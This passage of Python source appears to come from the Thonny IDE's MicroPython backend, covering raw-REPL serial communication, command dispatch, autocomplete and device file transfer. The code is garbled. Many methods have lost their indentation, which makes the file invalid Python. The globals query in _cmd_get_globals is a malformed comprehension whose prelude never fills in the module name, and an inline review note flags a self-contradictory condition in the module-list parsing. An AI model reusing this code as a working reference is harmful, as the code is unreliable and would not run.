            self._on_connection_closed()
        except Exception:
            # Last-resort handler: log the crash instead of dying silently.
            logger.exception("Crash in backend")
            traceback.print_exc()
    def _prepare(self, clean):
        """Bring the board to a raw prompt, fetch environment info, announce ready.

        When *clean* is set the board is interrupted and its globals cleared;
        otherwise output is consumed until the initial raw prompt appears.
        """
        if clean:
            self._interrupt_to_raw_prompt()
            self._clear_environment()
        else:
            self._process_until_initial_raw_prompt()
        self._cwd = self._fetch_cwd()
        self._welcome_text = self._fetch_welcome_text()
        self._builtin_modules = self._fetch_builtin_modules()
        self._builtins_info = self._fetch_builtins_info()
        self._send_ready_message()
    def _mainloop(self):
        """Dispatch queued commands forever; poll for idle work on timeout.

        Interrupt/cancel flags are reset at the top of every iteration so a
        stale request cannot affect the next command.
        """
        while True:
            try:
                self._cancel_requested = False
                self._interrupt_requested = False
                self._check_for_connection_errors()
                cmd = self._command_queue.get(timeout=0.1)
                if isinstance(cmd, InputSubmission):
                    self._submit_input(cmd.data)
                elif isinstance(cmd, EOFCommand):
                    self._soft_reboot(False)
                elif isinstance(cmd, InterruptCommand):
                    self._interrupt()
                else:
                    self.handle_command(cmd)
            except Empty:
                # No command within the timeout: do background housekeeping.
                self._check_for_idle_events()
            except KeyboardInterrupt:
                self._interrupt()
    def _fetch_welcome_text(self):
        """Read the board's normal-REPL banner, then return to the raw prompt."""
        self._connection.write(NORMAL_MODE_CMD)
        welcome_text = self._connection.read_until(NORMAL_PROMPT).strip(b"\r\n >")
        if os.name != "nt":
            welcome_text = welcome_text.replace(b"\r\n", b"\n")
        # Go back to raw prompt
        self._connection.write(RAW_MODE_CMD)
        self._connection.read_until(FIRST_RAW_PROMPT)
        return welcome_text.decode(ENCODING)
def _fetch_uname(self):
res = self._evaluate("__thonny_os.uname()", prelude="import os as __thonny_os")
return {
"sysname": res[0],
"nodename": res[1],
"release": res[2],
"version": res[3],
"machine": res[4],
}
    def _fetch_builtin_modules(self):
        """Query the board via help('modules') and return module names as a list."""
        out, err, _ = self._execute("help('modules')", capture_output=True)
        assert not err, "Error was: %r" % err
        modules_str_lines = out.strip().splitlines()
        last_line = modules_str_lines[-1].strip()
        # NOTE(review): this condition looks self-contradictory as written
        # (count(" ") > 0 together with " " not in last_line); presumably the
        # second test was meant to check for a *double* space and lost a
        # character somewhere — verify against the upstream source.
        if last_line.count(" ") > 0 and " " not in last_line and "\t" not in last_line:
            # probably something like "plus any modules on the filesystem"
            # (can be in different languages)
            modules_str_lines = modules_str_lines[:-1]
        # Flatten, strip package-init noise, and convert path separators
        # into dotted module names.
        modules_str = (
            " ".join(modules_str_lines)
            .replace("/__init__", "")
            .replace("__main__", "")
            .replace("/", ".")
        )
        return modules_str.split()
def _fetch_builtins_info(self):
"""
for p in self._get_api_stubs_path():
builtins_file = os.path.join(p, "__builtins__.py")
if os.path.exists(builtins_file):
return parse_api_information(builtins_file)
"""
path = os.path.join(self._api_stubs_path, "builtins.py")
if os.path.exists(path):
return parse_api_information(path)
else:
return {}
    def _fetch_cwd(self):
        """Return the board's working directory, or '' if os.getcwd is absent."""
        return self._evaluate(
            "__thonny_os.getcwd() if hasattr(__thonny_os, 'getcwd') else ''",
            prelude="import os as __thonny_os",
        )
    def _send_ready_message(self):
        """Tell the frontend the backend is ready (banner text + cwd)."""
        self.send_message(ToplevelResponse(welcome_text=self._welcome_text, cwd=self._cwd))
def _check_send_inline_progress(self, cmd, value, maximum, description=None):
    """Report progress of *cmd* to the frontend, rate-limited to ~5 events/s.

    The completing event (value == maximum) is always sent regardless of
    the rate limit.
    """
    assert "id" in cmd
    prev_time = self._progress_times.get(cmd["id"], 0)
    if value != maximum and time.time() - prev_time < 0.2:
        # Don't notify too often
        return
    else:
        self._progress_times[cmd["id"]] = time.time()

    if description is None:
        description = cmd.get("description", "Working...")

    self.send_message(
        BackendEvent(
            event_type="InlineProgress",
            command_id=cmd["id"],
            value=value,
            maximum=maximum,
            description=description,
        )
    )
def _interrupt(self):
    """Send Ctrl-C to the device to interrupt whatever it is currently running."""
    self._connection.write(INTERRUPT_CMD)
def _check_for_interrupt(self, action_scope):
if action_scope == "device" and self._interrupt_requested:
self._interrupt()
self._interrupt_requested = False
if action_scope == "local" and self._cancel_requested:
self._cancel_requested = False
raise KeyboardInterrupt()
def _interrupt_to_raw_prompt(self):
    """Interrupt running code and force the device to the raw REPL prompt.

    Retries with growing delays; raises TimeoutError when no raw prompt
    appears after all attempts.
    """
    # NB! Sometimes disconnecting and reconnecting (on macOS?)
    # too quickly causes anomalies. See CalliopeMiniProxy for more details
    discarded_bytes = b""

    for delay in [0.05, 0.5, 0.1, 2.0]:
        # Interrupt several times, because with some drivers first interrupts seem to vanish
        self._connection.reset_output_buffer()
        self._connection.write(INTERRUPT_CMD)
        self._connection.write(RAW_MODE_CMD)
        time.sleep(delay)
        discarded_bytes += self._connection.read_all()
        if discarded_bytes.endswith(FIRST_RAW_PROMPT) or discarded_bytes.endswith(b"\r\n>"):
            break
    else:
        # for-else: no break happened, ie. never saw a raw prompt
        raise TimeoutError("Can't get to raw prompt. Read bytes: " + str(discarded_bytes))
def _soft_reboot(self, side_command):
    """Soft-reboot the device with Ctrl-D.

    side_command -- True when triggered asynchronously (EOF received while
    user code is running): in that case interrupt first to reach a known
    prompt state and don't consume the reboot output here.
    """
    if side_command:
        self._interrupt_to_raw_prompt()

    # Need to go to normal mode. MP doesn't run user code in raw mode
    # (CP does, but it doesn't hurt to do it there as well)
    self._connection.write(NORMAL_MODE_CMD)
    self._connection.read_until(NORMAL_PROMPT)

    self._connection.write(SOFT_REBOOT_CMD)

    if not side_command:
        self._process_until_raw_prompt()
        self.send_message(ToplevelResponse(cwd=self._cwd))
def _read_commands(self):
    """Reader-thread body: pump commands from stdin into the command queue.

    Runs in a separate thread. Interrupt commands are flagged immediately
    (not queued) so the serial loop can react while user code is running.
    Exits the thread on stdin EOF.
    """
    while True:
        line = sys.stdin.readline()
        if line == "":
            logger.info("Read stdin EOF")
            sys.exit()
        cmd = parse_message(line)
        if isinstance(cmd, InterruptCommand):
            # bypass the queue: must take effect even mid-command
            self._interrupt_requested = True
            self._cancel_requested = True
        else:
            self._command_queue.put(cmd)
def handle_command(self, cmd):
    """Dispatch *cmd* to its _cmd_<name> handler and send back a response.

    Handler return value conventions: None -> empty response; False -> no
    response at all; dict -> wrapped into Toplevel/InlineResponse.
    Exceptions from handlers are converted into error responses so the
    backend keeps serving.
    """
    assert isinstance(cmd, (ToplevelCommand, InlineCommand))

    def create_error_response(**kw):
        # response class must match the command class
        if isinstance(cmd, ToplevelCommand):
            return ToplevelResponse(command_name=cmd.name, **kw)
        else:
            return InlineResponse(command_name=cmd.name, **kw)

    handler = getattr(self, "_cmd_" + cmd.name, None)

    if handler is None:
        response = create_error_response(error="Unknown command: " + cmd.name)
    else:
        try:
            response = handler(cmd)
        except SystemExit:
            # Must be caused by Thonny or plugins code
            if isinstance(cmd, ToplevelCommand):
                traceback.print_exc()
            response = create_error_response(SystemExit=True)
        except UserError as e:
            sys.stderr.write(str(e) + "\n")
            response = create_error_response()
        except KeyboardInterrupt:
            response = create_error_response(error="Interrupted", interrupted=True)
        except Exception:
            _report_internal_error()
            response = create_error_response(context_info="other unhandled exception")

    if response is None:
        response = {}

    if response is False:
        # Command doesn't want to send any response
        return
    elif isinstance(response, dict):
        if isinstance(cmd, ToplevelCommand):
            response = ToplevelResponse(command_name=cmd.name, **response)
        elif isinstance(cmd, InlineCommand):
            response = InlineResponse(cmd.name, **response)

    if "id" in cmd and "command_id" not in response:
        # echo command id so the frontend can correlate request/response
        response["command_id"] = cmd["id"]

    debug("cmd: " + str(cmd) + ", respin: " + str(response))
    self.send_message(response)
def _submit_input(self, cdata: str) -> None:
    """Forward user input to the device and consume the terminal echo.

    The echo check is best-effort: on timeout or mismatch (autoreload?
    interruption?) the read bytes are pushed back for normal output
    processing.
    """
    # TODO: what if there is a previous unused data waiting
    assert self._connection.outgoing_is_empty()

    assert cdata.endswith("\n")
    if not cdata.endswith("\r\n"):
        # submission is done with CRLF
        cdata = cdata[:-1] + "\r\n"

    bdata = cdata.encode(ENCODING)

    self._connection.write(bdata)
    # Try to consume the echo
    try:
        echo = self._connection.read(len(bdata))
    except queue.Empty:
        # leave it.
        logging.warning("Timeout when reading echo")
        return

    if echo != bdata:
        # because of autoreload? timing problems? interruption?
        # Leave it.
        logging.warning("Unexpected echo. Expected %s, got %s" % (bdata, echo))
        self._connection.unread(echo)
def send_message(self, msg):
    """Serialize *msg* to stdout for the frontend, stamping in current cwd if absent."""
    if "cwd" not in msg:
        msg["cwd"] = self._cwd
    # print adds the trailing newline and flushes in one go
    print(serialize_message(msg), file=sys.stdout, flush=True)
def _send_output(self, data, stream_name):
    """Forward program output to the frontend as a ProgramOutput event (no-op for empty data)."""
    if not data:
        return

    event = BackendEvent(
        event_type="ProgramOutput",
        stream_name=stream_name,
        data=self._transform_output(data),
    )
    self.send_message(event)
def _transform_output(self, data):
# Any keypress wouldn't work
return data.replace(
"Press any key to enter the REPL. Use CTRL-D to reload.",
"Press Ctrl-C to enter the REPL. Use CTRL-D to reload.",
)
def _execute(self, script, capture_output=False):
    """Submit *script* to the raw REPL and process output until the next raw prompt.

    Returns (stdout, stderr, value_repr) as produced by
    _process_until_raw_prompt.
    """
    # self._ensure_raw_propmt()
    # send command
    self._connection.write(script.encode(ENCODING) + EOT)
    debug("Wrote " + script + "\n--------\n")

    # fetch command confirmation
    ok = self._connection.read(2)
    debug("GOTOK")
    assert ok == OK, "Expected OK, got %r, followed by %r" % (ok, self._connection.read_all())
    return self._process_until_raw_prompt(capture_output)
def _execute_without_output(self, script):
out, err, value = self._execute(script, capture_output=True)
if err or out:
raise RuntimeError("Failed MP script: " + str(out) + "\n" + str(err))
return value
def _execute_print_expr(self, expr, prelude="", cleanup="", capture_output=False):
    """Evaluate *expr* on the device, wrapping its repr between Thonny markers.

    The markers let _process_until_raw_prompt separate the value from
    regular side-effect output.
    """
    # assuming expr really contains an expression
    # separator is for separating side-effect output and printed value
    script = ""
    if prelude:
        script += prelude + "\n"
    script += "print(%r, repr(%s), sep='', end=%r)" % (
        THONNY_MSG_START.decode(),
        expr,
        THONNY_MSG_END.decode(),
    )

    # assuming cleanup doesn't cause output
    if cleanup:
        script += "\n" + cleanup

    return self._execute(script, capture_output)
def _evaluate(self, expr, prelude="", cleanup=""):
_, _, value_repr = self._execute_print_expr(expr, prelude, cleanup)
if value_repr is None:
return None
else:
return ast.literal_eval(value_repr)
def _process_until_initial_raw_prompt(self):
    """Enter raw mode right after connecting, tolerating a user Ctrl-C meanwhile."""
    self._connection.write(RAW_MODE_CMD)
    try:
        self._process_until_raw_prompt()
    except KeyboardInterrupt:
        self._interrupt()
def _process_until_raw_prompt(self, capture_output=False):
    """
    Forwards output, extracts Thonny message, replaces normal prompts with raw prompts.

    This is executed when some code is running or just after requesting raw prompt.

    After submitting commands to the raw REPL, the output should be like
    {stdout}\x04\{stderr}\x04\n\>

    In the end of {stdout} there may be \x02{value-for-thonny}

    Interrupts will alter the execution, but from the response parsing
    perspective they don't matter as they look like any other exception.

    Things get complicated because of soft-reboots, which always end with
    regular prompt. Soft-reboots can occur because of Ctrl+D, machine.soft_reset()
    and even reset button (micro:bit).

    Because of soft-reboot we can't assume we'll find the terminating markers for
    each command.

    Output produced by background threads (eg. in WiPy ESP32) cause even more difficulties,
    because it becomes impossible to say whether we are at prompt and output
    is from another thread or the main thread is running.
    For now I'm ignoring these problems and assume all output comes from the main thread.

    Returns (stdout, stderr, value_repr_or_None) decoded with ENCODING.
    """
    # TODO: experiment with Ctrl+C, Ctrl+D, reset
    eot_count = 0  # 0: reading stdout part, 1: reading stderr part, 2: done
    value = None
    done = False
    output = b""  # unflushed chunk currently being parsed
    out = b""  # accumulated stdout (only when capture_output)
    err = b""  # accumulated stderr (only when capture_output)

    while not done:
        if (
            self._connection.num_bytes_received == 0
            and not self._ctrl_suggestion_given
            and time.time() - self._startup_time > 1.5
        ):
            # device has been silent since connecting -- give the user a hint
            self._send_output(
                "\n"
                + "Device is busy or does not respond. Your options:\n\n"
                + "  - check the connection properties;\n"
                + "  - make sure the device has suitable firmware;\n"
                + "  - make sure the device is not in bootloader mode;\n"
                + "  - wait until current work is complete;\n"
                + "  - use Ctrl+C to interrupt current work.\n",
                "stderr",
            )
            self._ctrl_suggestion_given = True

        # There may be an input submission waiting
        # and we can't progress without resolving it first
        self._check_for_side_commands()
        self._check_for_interrupt("device")

        # Process input in chunks (max 1 parsing marker per chunk).
        # Prefer whole lines (to reduce the number of events),
        # but don't wait too long for eol.
        output += self._connection.soft_read_until(BLOCK_CLOSERS, timeout=0.05)
        stream_name = "stderr" if eot_count == 1 else "stdout"

        if output.endswith(THONNY_MSG_START):
            debug("MSGSTA: " + str(output))
            output = output[: -len(THONNY_MSG_START)]

            # Low chance of failure (eg. because of precisely timed reboot),
            # therefore it's safe to use big timeout
            temp = self._connection.soft_read_until(THONNY_MSG_END, timeout=3)
            if temp.endswith(THONNY_MSG_END):
                value = temp[: -len(THONNY_MSG_END)]
                debug("GOTVALUE: " + str(value))
            else:
                # failure, restore everything to help diagnosis
                output = output + THONNY_MSG_START + temp

        elif output.endswith(EOT):
            debug("EOT: " + str(output))
            output = output[: -len(EOT)]
            eot_count += 1
            if eot_count == 2:
                # Normal completion of the command
                # big chance of being at the raw prompt
                temp = self._connection.soft_read_until(RAW_PROMPT, timeout=0.1)
                if temp == RAW_PROMPT and self._connection.incoming_is_empty():
                    done = True
                elif temp:
                    # Failure, temp needs to be parsed again
                    self._connection.unread(temp)

        elif output.endswith(FIRST_RAW_PROMPT) and self._connection.incoming_is_empty():
            # happens eg. after soft-reboot / fresh raw-mode entry
            debug("FIRAPRO: " + str(output))
            output = output[: -len(FIRST_RAW_PROMPT)]
            done = True

        elif (
            output.endswith(NORMAL_PROMPT)
            and self._connection.peek_incoming() == b"\r\n" + FIRST_RAW_PROMPT
        ):
            debug("NOPRO: " + str(output))
            output = output + self._connection.read_until(FIRST_RAW_PROMPT)
            # skip both normal and raw prompt together
            # (otherwise they get processed separately)
            output = output[: -len(NORMAL_PROMPT + b"\r\n" + FIRST_RAW_PROMPT)]
            done = True

        elif output.endswith(NORMAL_PROMPT) and self._connection.incoming_is_empty():
            debug("NOPRO2: " + str(output))
            output = output[: -len(NORMAL_PROMPT)]
            # switch to raw mode and continue
            self._connection.write(RAW_MODE_CMD)

        if output.endswith(FIRST_RAW_PROMPT[:-1]):
            # incomplete raw prompt, wait for more
            pass
        else:
            if capture_output:
                if stream_name == "stdout":
                    out += output
                else:
                    assert stream_name == "stderr"
                    err += output
            else:
                # TODO: deal with partial UTF-8 chars
                self._send_output(output.decode(ENCODING), stream_name)
            output = b""

    debug("doneproc")
    return (
        out.decode(ENCODING),
        err.decode(ENCODING),
        None if value is None else value.decode(ENCODING),
    )
def _clear_environment(self):
    """Reset the device's __main__ globals before running a new program."""
    # TODO: Ctrl+D in raw repl is perfect for MicroPython
    # but on CircuitPython it runs main.py

    # TODO: which is better:
    # self._execute_async(dedent("""
    #     for name in globals():
    #         if not name.startswith("__"):
    #             del globals()[name]
    # """).strip())
    # or
    self._execute("globals().clear(); __name__ = '__main__'")
def _check_for_side_commands(self):
    """Service queued commands that may arrive while user code is running.

    Input submissions and EOF (soft reboot) are handled immediately;
    everything else is put back in FIFO order for the main loop.
    """
    if self._command_queue.empty():
        # fast path: usually nothing is waiting
        return

    deferred = []
    while not self._command_queue.empty():
        cmd = self._command_queue.get()
        if isinstance(cmd, InputSubmission):
            self._submit_input(cmd.data)
        elif isinstance(cmd, EOFCommand):
            self._soft_reboot(True)
        else:
            deferred.append(cmd)

    # requeue the commands this method is not responsible for
    for cmd in deferred:
        self._command_queue.put(cmd)
def _check_for_idle_events(self):
    """Forward output the device produced on its own (no command running) and check health."""
    self._send_output(self._connection.read_all().decode(ENCODING, "replace"), "stdout")
    self._check_for_connection_errors()
def _supports_directories(self):
# NB! make sure self._cwd is queried first
return bool(self._cwd)
def _connected_to_microbit(self):
return "micro:bit" in self._welcome_text.lower()
def _cmd_interrupt(self, cmd):
    """Handle the frontend's explicit interrupt command."""
    self._interrupt()
def _cmd_cd(self, cmd):
    """Change the device's working directory (%cd magic); expects exactly one argument."""
    if len(cmd.args) == 1:
        if not self._supports_directories():
            raise UserError("This device doesn't have directories")

        path = cmd.args[0]
        self._execute("import os as __thonny_os; __thonny_os.chdir(%r)" % path)
        # re-query so _cwd reflects what the device actually reports
        self._cwd = self._fetch_cwd()
        return {}
    else:
        raise UserError("%cd takes one parameter")
def _cmd_Run(self, cmd):
    """Run a program: clear the device's globals, then execute the given source."""
    self._clear_environment()
    assert cmd.get("source")
    self._execute(cmd["source"])
    return {}
def _cmd_execute_source(self, cmd):
    """Execute shell input: expressions get their value echoed back, statements just run."""
    try:
        # Try to parse as expression
        ast.parse(cmd.source, mode="eval")
        # If it didn't fail then source is an expression
        _, _, value_repr = self._execute_print_expr(cmd.source)
        if value_repr is None:
            value_repr = repr(None)
        return {"value_info": ValueInfo(0, value_repr)}
    except SyntaxError:
        # source is a statement (or invalid syntax)
        self._execute(cmd.source)
        return {}
def _cmd_get_globals(self, cmd):
if cmd.module_name == "__main__":
globs = self._evaluate(
"{name : repr(value) for (name, value) in globals().items() if not name.startswith('__')}"
)
else:
globs = self._evaluate(
"{name : repr(getattr(__mod_for_globs, name)) in dir(__mod_for_globs) if not name.startswith('__')}",
prelude="import %s as __mod_for_globs",
)
return {"module_name": cmd.module_name, "globals": globs}
def _cmd_get_dirs_child_data(self, cmd):
    """Return child entries (kind/size) for each requested directory path.

    On micro:bit (no directories) only the flat root listing ("" path) is
    possible, and the directory separator is empty.
    """
    if self._supports_directories():
        data = self._get_dirs_child_data_generic(cmd["paths"])
        dir_separator = "/"
    else:
        assert cmd["paths"] == {""}, "Bad command: " + repr(cmd)
        sizes = self._get_microbit_file_sizes()
        root_data = {name: {"kind": "file", "size": size} for (name, size) in sizes.items()}
        data = {"": root_data}
        dir_separator = ""

    return {"node_id": cmd["node_id"], "dir_separator": dir_separator, "data": data}
def _cmd_get_fs_info(self, cmd):
    """Return total/used/free information for the filesystem containing cmd.path."""
    return self._get_fs_info(cmd.path)
def _cmd_write_file(self, cmd):
    """Write the given bytes to a remote file, streamed in fixed-size blocks."""

    def generate_blocks(content_bytes, block_size):
        # lazily slice the payload so huge files aren't duplicated in memory
        for i in range(0, len(content_bytes), block_size):
            yield content_bytes[i : i + block_size]

    self._write_file(generate_blocks(cmd["content_bytes"], BUFFER_SIZE), cmd["path"])

    return InlineResponse(
        command_name="write_file", path=cmd["path"], editor_id=cmd.get("editor_id")
    )
def _cmd_delete(self, cmd):
assert cmd.paths
paths = sorted(cmd.paths, key=lambda x: len(x), reverse=True)
try:
self._delete_via_serial(paths)
except Exception as e:
if "read-only" in str(e).lower():
self._delete_via_mount(paths)
self._sync_all_filesystems()
def _internal_path_to_mounted_path(self, path):
mount_path = self._get_fs_mount()
if mount_path is None:
return None
flash_prefix = self._get_flash_prefix()
if not path.startswith(flash_prefix):
return None
path_suffix = path[len(flash_prefix) :]
return os.path.join(mount_path, os.path.normpath(path_suffix))
def _cmd_read_file(self, cmd):
try:
content_bytes = b"".join(self._read_file(cmd["path"]))
error = None
except Exception as e:
_report_internal_error()
error = str(e)
content_bytes = None
return {"content_bytes": content_bytes, "path": cmd["path"], "error": error}
def _cmd_download(self, cmd):
    """Download remote files into a local directory, reporting progress.

    If overwriting is not allowed and some targets exist, returns the
    conflict information instead of downloading anything.
    """
    total_size = 0
    completed_files_size = 0
    remote_files = self._list_remote_files_with_info(cmd["source_paths"])
    target_dir = cmd["target_dir"].rstrip("/").rstrip("\\")

    download_items = []
    for file in remote_files:
        total_size += file["size"]
        # compute filenames (and subdirs) in target_dir
        # relative to the context of the user selected items
        assert file["path"].startswith(file["original_context"])
        path_suffix = file["path"][len(file["original_context"]) :].strip("/").strip("\\")
        target_path = os.path.join(target_dir, os.path.normpath(path_suffix))
        download_items.append(dict(source=file["path"], target=target_path, size=file["size"]))

    if not cmd["allow_overwrite"]:
        targets = [item["target"] for item in download_items]
        existing_files = list(filter(os.path.exists, targets))
        if existing_files:
            # let the frontend ask the user before anything is overwritten
            return {
                "existing_files": existing_files,
                "source_paths": cmd["source_paths"],
                "target_dir": cmd["target_dir"],
                "description": cmd["description"],
            }

    def notify(current_file_progress):
        # closure reads completed_files_size, which grows as files finish
        self._check_send_inline_progress(
            cmd, completed_files_size + current_file_progress, total_size
        )

    # replace the indeterminate progressbar with determinate as soon as possible
    notify(0)

    for item in download_items:
        written_bytes = self._download_file(item["source"], item["target"], notify)
        assert written_bytes == item["size"]
        completed_files_size += item["size"]
def _cmd_upload(self, cmd):
    """Upload local files into a remote directory, reporting progress.

    If overwriting is not allowed and some targets exist, returns the
    conflict information instead of uploading anything.
    """
    completed_files_size = 0
    local_files = self._list_local_files_with_info(cmd["source_paths"])
    target_dir = cmd["target_dir"]
    assert target_dir.startswith("/") or not self._supports_directories()
    assert not target_dir.endswith("/") or target_dir == "/"

    upload_items = []
    for file in local_files:
        # compute filenames (and subdirs) in target_dir
        # relative to the context of the user selected items
        assert file["path"].startswith(file["original_context"])
        path_suffix = file["path"][len(file["original_context"]) :].strip("/").strip("\\")
        target_path = self._join_remote_path_parts(target_dir, to_remote_path(path_suffix))
        upload_items.append(dict(source=file["path"], target=target_path, size=file["size"]))

    if not cmd["allow_overwrite"]:
        targets = [item["target"] for item in upload_items]
        existing_files = self._get_existing_remote_files(targets)
        if existing_files:
            # let the frontend ask the user before anything is overwritten
            return {
                "existing_files": existing_files,
                "source_paths": cmd["source_paths"],
                "target_dir": cmd["target_dir"],
                "description": cmd["description"],
            }

    total_size = sum([item["size"] for item in upload_items])

    def notify(current_file_progress):
        # closure reads completed_files_size, which grows as files finish
        self._check_send_inline_progress(
            cmd, completed_files_size + current_file_progress, total_size
        )

    # replace the indeterminate progressbar with determinate as soon as possible
    notify(0)

    for item in upload_items:
        written_bytes = self._upload_file(item["source"], item["target"], notify)
        assert written_bytes == item["size"]
        completed_files_size += item["size"]
def _cmd_mkdir(self, cmd):
    """Create a remote directory (with parents) and sync filesystems."""
    assert self._supports_directories()
    assert cmd.path.startswith("/")
    self._makedirs(cmd.path)
    self._sync_all_filesystems()
def _cmd_editor_autocomplete(self, cmd):
    """Compute editor completions with jedi against the MicroPython API stubs."""
    # template for the response
    result = dict(source=cmd.source, row=cmd.row, column=cmd.column)

    try:
        script = jedi.Script(cmd.source, cmd.row, cmd.column, sys_path=[self._api_stubs_path])
        completions = script.completions()
        result["completions"] = self._filter_completions(completions)
    except Exception:
        result["error"] = "Autocomplete error"

    return result
def _filter_completions(self, completions):
# filter out completions not applicable to MicroPython
result = []
for completion in completions:
if completion.name.startswith("__"):
continue
parent_name = completion.parent().name
name = completion.name
root = completion.full_name.split(".")[0]
# jedi proposes names from CPython builtins
if root in self._builtins_info and name not in self._builtins_info[root]:
continue
if parent_name == "builtins" and name not in self._builtins_info:
continue
result.append({"name": name, "complete": completion.complete})
return result
def _cmd_shell_autocomplete(self, cmd):
    """Compute shell completions.

    Import statements are completed with jedi against the API stubs;
    everything else is completed from live dir() data queried from the
    device.
    """
    source = cmd.source

    # TODO: combine dynamic results and jedi results
    if source.strip().startswith("import ") or source.strip().startswith("from "):
        # this needs the power of jedi
        response = {"source": cmd.source}

        try:
            # at the moment I'm assuming source is the code before cursor, not whole input
            lines = source.split("\n")
            script = jedi.Script(
                source, len(lines), len(lines[-1]), sys_path=[self._api_stubs_path]
            )
            completions = script.completions()
            response["completions"] = self._filter_completions(completions)
        except Exception:
            traceback.print_exc()
            response["error"] = "Autocomplete error"

        return response
    else:
        # use live data
        match = re.search(
            r"(\w+\.)*(\w+)?$", source
        )  # https://github.com/takluyver/ubit_kernel/blob/master/ubit_kernel/kernel.py
        if match:
            prefix = match.group()
            if "." in prefix:
                # complete attributes of the object before the last dot
                obj, prefix = prefix.rsplit(".", 1)
                names = self._evaluate("dir(%s)" % obj)
            else:
                names = self._evaluate("dir()")
        else:
            names = []
            prefix = ""

        completions = []
        for name in names:
            if name.startswith(prefix) and not name.startswith("__"):
                completions.append({"name": name, "complete": name[len(prefix) :]})

        return {"completions": completions, "source": source}
def _cmd_dump_api_info(self, cmd):
    """Dump API stub files for all built-in modules (plug-in development helper)."""
    # For use during development of the plug-in
    # install a device-side introspection helper first
    self._execute(
        dedent(
            """
            def __get_object_atts(obj):
                result = []
                errors = []
                for name in dir(obj):
                    try:
                        val = getattr(obj, name)
                        result.append((name, repr(val), repr(type(val))))
                    except BaseException as e:
                        errors.append("Couldn't get attr '%s' from object '%r', Err: %r" % (name, obj, e))
                return (result, errors)
            """
        )
    )

    for module_name in sorted(self._fetch_builtin_modules()):
        if (
            not module_name.startswith("_")
            and not module_name.startswith("adafruit")
            # and not module_name == "builtins"
        ):
            file_name = os.path.join(
                self._api_stubs_path, module_name.replace(".", "/") + ".py"
            )
            self._dump_module_stubs(module_name, file_name)
def _dump_module_stubs(self, module_name, file_name):
    """Import *module_name* on the device and write a stub file for it into *file_name*."""
    out, err, __ = self._execute("import {0}".format(module_name), capture_output=True)
    if out or err:
        print("FAILED IMPORTING MODULE:", module_name, "\nErr: " + out + err)
        return

    os.makedirs(os.path.dirname(file_name), exist_ok=True)

    with io.open(file_name, "w", encoding="utf-8", newline="\n") as fp:
        # modules in this list are left with an empty stub file --
        # presumably they misbehave during introspection (TODO confirm)
        if module_name not in [
            "webrepl",
            "_webrepl",
            "gc",
            "http_client",
            "http_client_ssl",
            "http_server",
            "framebuf",
            "example_pub_button",
            "flashbdev",
        ]:
            self._dump_object_stubs(fp, module_name, "")
def _dump_object_stubs(self, fp, object_expr, indent):
    """Recursively write stub definitions for *object_expr*'s attributes into *fp*.

    Functions become pass-bodied defs, simple constants keep their repr,
    classes are expanded one level (toplevel only), everything else is
    stubbed as None.
    """
    if object_expr in [
        "docs.conf",
        "pulseio.PWMOut",
        "adafruit_hid",
        "upysh",
        # "webrepl",
        # "gc",
        # "http_client",
        # "http_server",
    ]:
        print("SKIPPING problematic name:", object_expr)
        return

    print("DUMPING", indent, object_expr)
    items, errors = self._evaluate("__get_object_atts({0})".format(object_expr))

    if errors:
        print("ERRORS", errors)

    for name, rep, typ in sorted(items, key=lambda x: x[0]):
        if name.startswith("__"):
            continue

        print("DUMPING", indent, object_expr, name)
        self._send_text_to_shell(" * " + name + " : " + typ, "stdout")

        if typ in ["<class 'function'>", "<class 'bound_method'>"]:
            fp.write(indent + "def " + name + "():\n")
            fp.write(indent + " pass\n\n")
        elif typ in ["<class 'str'>", "<class 'int'>", "<class 'float'>"]:
            fp.write(indent + name + " = " + rep + "\n")
        elif typ == "<class 'type'>" and indent == "":
            # full expansion only on toplevel
            fp.write("\n")
            fp.write(indent + "class " + name + ":\n")  # What about superclass?
            fp.write(indent + " ''\n")
            self._dump_object_stubs(fp, "{0}.{1}".format(object_expr, name), indent + " ")
        else:
            # keep only the name
            fp.write(indent + name + " = None\n")
def _read_file(self, path):
    """Generator yielding the content of remote *path* in 512-byte blocks.

    Transfers via hexlify when the device has binascii (binary-safe);
    otherwise relies on repr of the raw bytes. Cleans up the device-side
    file handle and helper afterwards.
    """
    # TODO: read from mount when possible
    # file_size = self._get_file_size(path)
    block_size = 512

    self._execute_without_output("__thonny_fp = open(%r, 'rb')" % path)
    if "binascii" in self._builtin_modules:
        self._execute_without_output("from binascii import hexlify as __temp_hexlify")

    while True:
        self._check_for_interrupt("local")
        if "binascii" in self._builtin_modules:
            block = binascii.unhexlify(
                self._evaluate("__temp_hexlify(__thonny_fp.read(%s))" % block_size)
            )
        else:
            block = self._evaluate("__thonny_fp.read(%s)" % block_size)

        if block:
            yield block

        if len(block) < block_size:
            # short read means end of file
            break

    self._execute_without_output(
        dedent(
            """
            __thonny_fp.close()
            del __thonny_fp
            try:
                del __temp_hexlify
            except:
                pass
            """
        )
    )
def _write_file(self, content_blocks, target_path, notifier=None):
try:
result = self._write_file_via_serial(content_blocks, target_path, notifier)
except ReadOnlyFilesystemError:
result = self._write_file_via_mount(content_blocks, target_path, notifier)
self._sync_all_filesystems()
return result
def _write_file_via_mount(self, content_blocks, target_path, notifier=None):
mounted_target_path = self._internal_path_to_mounted_path(target_path)
with open(mounted_target_path, "wb") as f:
bytes_written = 0
for block in content_blocks:
self._check_for_interrupt("local")
bytes_written += f.write(block)
f.flush()
os.fsync(f)
if notifier is not None:
notifier(bytes_written)
return bytes_written
def _write_file_via_serial(self, content_blocks, target_path, notifier=None):
    """Write blocks to remote *target_path* over the raw REPL.

    Raises ReadOnlyFilesystemError when the device refuses the open with a
    read-only error, and UserError when the device reports a different
    byte count than was sent. Device-side helpers are always cleaned up.
    """
    # prelude
    try:
        _, err, _ = self._execute(
            dedent(
                """
                __thonny_path = '{path}'
                __thonny_written = 0
                __thonny_fp = open(__thonny_path, 'wb')
                """
            ).format(path=target_path),
            capture_output=True,
        )

        # normalize "read-only" / "readonly" spellings before checking
        if "readonly" in err.replace("-", "").lower():
            raise ReadOnlyFilesystemError()
        elif err:
            raise RuntimeError("Problem opening file for writing: " + err)

        # Define function to allow shorter write commands
        if "binascii" in self._builtin_modules:
            self._execute_without_output(
                dedent(
                    """
                    from binascii import unhexlify as __thonny_unhex
                    def __W(x):
                        global __thonny_written
                        __thonny_written += __thonny_fp.write(__thonny_unhex(x))
                    """
                )
            )
        else:
            self._execute_without_output(
                dedent(
                    """
                    def __W(x):
                        global __thonny_written
                        __thonny_written += __thonny_fp.write(x)
                    """
                )
            )

        bytes_sent = 0
        for block in content_blocks:
            self._check_for_interrupt("local")
            if "binascii" in self._builtin_modules:
